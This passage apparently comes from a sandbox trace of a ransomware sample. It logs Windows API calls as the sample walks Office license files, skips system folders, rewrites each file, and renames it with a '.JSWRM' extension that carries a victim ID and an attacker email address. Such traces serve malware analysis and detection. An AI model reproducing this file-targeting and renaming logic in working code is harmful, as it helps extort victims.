lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardMSDNR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0110.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0110.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0110.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0110.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0110.261] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardMSDNR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardmsdnr_retail-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.261] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11605) returned 1 [0110.261] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0110.261] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0110.264] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.264] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0110.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.264] CloseHandle (hObject=0x45c) returned 1 [0110.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0110.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0110.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0110.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0110.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0110.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0110.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0110.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0110.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0110.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0110.265] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardMSDNR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardmsdnr_retail-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardMSDNR_Retail-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardmsdnr_retail-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0110.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0110.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0110.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0110.265] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb5e174f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb5e174f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb75eedd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4dee, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="StandardMSDNR_Retail-ul-phn.xrm-ms", cAlternateFileName="STANDA~3.XRM")) returned 1 [0110.266] lstrcmpiW (lpString1="StandardMSDNR_Retail-ul-phn.xrm-ms", lpString2=".") returned 1 [0110.266] lstrcmpiW (lpString1="StandardMSDNR_Retail-ul-phn.xrm-ms", lpString2="..") returned 1 [0110.266] lstrcmpiW (lpString1="StandardMSDNR_Retail-ul-phn.xrm-ms", lpString2="...") returned 1 [0110.266] lstrcmpiW (lpString1="StandardMSDNR_Retail-ul-phn.xrm-ms", lpString2="windows") returned -1 [0110.266] lstrcmpiW (lpString1="StandardMSDNR_Retail-ul-phn.xrm-ms", lpString2="recovery") returned 1 [0110.266] lstrcmpiW (lpString1="StandardMSDNR_Retail-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0110.266] lstrcmpiW (lpString1="StandardMSDNR_Retail-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0110.266] lstrcmpiW (lpString1="StandardMSDNR_Retail-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.266] lstrcmpiW (lpString1="StandardMSDNR_Retail-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0110.266] lstrcmpiW (lpString1="StandardMSDNR_Retail-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0110.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0110.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardMSDNR_Retail-ul-phn.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0110.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0110.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardMSDNR_Retail-ul-phn.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardMSDNR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0110.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0110.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0110.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardMSDNR_Retail-ul-phn.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0110.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0110.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardMSDNR_Retail-ul-phn.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22ce70, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardMSDNR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0110.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0110.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0110.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0110.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0110.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardMSDNR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardmsdnr_retail-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.267] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19950) returned 1 [0110.267] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0110.267] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0110.270] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.270] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0110.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.270] CloseHandle (hObject=0x45c) returned 1 [0110.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0110.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0110.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0110.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0110.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0110.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0110.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0110.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0110.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0110.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0110.270] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardMSDNR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardmsdnr_retail-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardMSDNR_Retail-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardmsdnr_retail-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0110.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0110.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0110.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0110.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.271] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb59528e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb59528e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb62dc06, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x57f3, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="StandardR_Grace-ppd.xrm-ms", cAlternateFileName="STANDA~2.XRM")) returned 1 [0110.271] lstrcmpiW (lpString1="StandardR_Grace-ppd.xrm-ms", lpString2=".") returned 1 [0110.271] lstrcmpiW (lpString1="StandardR_Grace-ppd.xrm-ms", lpString2="..") returned 1 [0110.271] lstrcmpiW (lpString1="StandardR_Grace-ppd.xrm-ms", lpString2="...") returned 1 [0110.271] lstrcmpiW (lpString1="StandardR_Grace-ppd.xrm-ms", lpString2="windows") returned -1 [0110.271] lstrcmpiW (lpString1="StandardR_Grace-ppd.xrm-ms", lpString2="recovery") returned 1 [0110.271] lstrcmpiW (lpString1="StandardR_Grace-ppd.xrm-ms", lpString2="perflogs") returned 1 [0110.271] lstrcmpiW (lpString1="StandardR_Grace-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0110.272] lstrcmpiW (lpString1="StandardR_Grace-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.272] lstrcmpiW (lpString1="StandardR_Grace-ppd.xrm-ms", lpString2="system volume information") returned -1 [0110.272] lstrcmpiW (lpString1="StandardR_Grace-ppd.xrm-ms", lpString2="msocache") returned 1 [0110.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0110.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Grace-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0110.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0110.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Grace-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x241330, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0110.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0110.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0110.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Grace-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0110.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0110.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Grace-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x241358, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0110.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0110.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0110.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0110.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0110.272] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_grace-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.273] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=22515) returned 1 [0110.273] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x57f0) returned 0x24c1d0 [0110.273] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x57f0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x57f0, lpOverlapped=0x0) returned 1 [0110.395] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.395] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x57f0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x57f0, lpOverlapped=0x0) returned 1 [0110.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.395] CloseHandle (hObject=0x45c) returned 1 [0110.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0110.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0110.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0110.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0110.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0110.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0110.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0110.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0110.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0110.396] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_grace-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Grace-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_grace-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0110.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0110.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0110.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0110.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0110.398] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb59528e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb59528e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb6079a7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d54, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="StandardR_Grace-ul-oob.xrm-ms", cAlternateFileName="STANDA~1.XRM")) returned 1 [0110.398] lstrcmpiW (lpString1="StandardR_Grace-ul-oob.xrm-ms", lpString2=".") returned 1 [0110.398] lstrcmpiW (lpString1="StandardR_Grace-ul-oob.xrm-ms", lpString2="..") returned 1 [0110.398] lstrcmpiW (lpString1="StandardR_Grace-ul-oob.xrm-ms", lpString2="...") returned 1 [0110.398] lstrcmpiW (lpString1="StandardR_Grace-ul-oob.xrm-ms", lpString2="windows") returned -1 [0110.398] lstrcmpiW (lpString1="StandardR_Grace-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0110.398] lstrcmpiW (lpString1="StandardR_Grace-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0110.398] lstrcmpiW (lpString1="StandardR_Grace-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0110.398] lstrcmpiW (lpString1="StandardR_Grace-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.398] lstrcmpiW (lpString1="StandardR_Grace-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0110.398] lstrcmpiW (lpString1="StandardR_Grace-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0110.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0110.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Grace-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0110.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0110.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Grace-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x240f48, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) 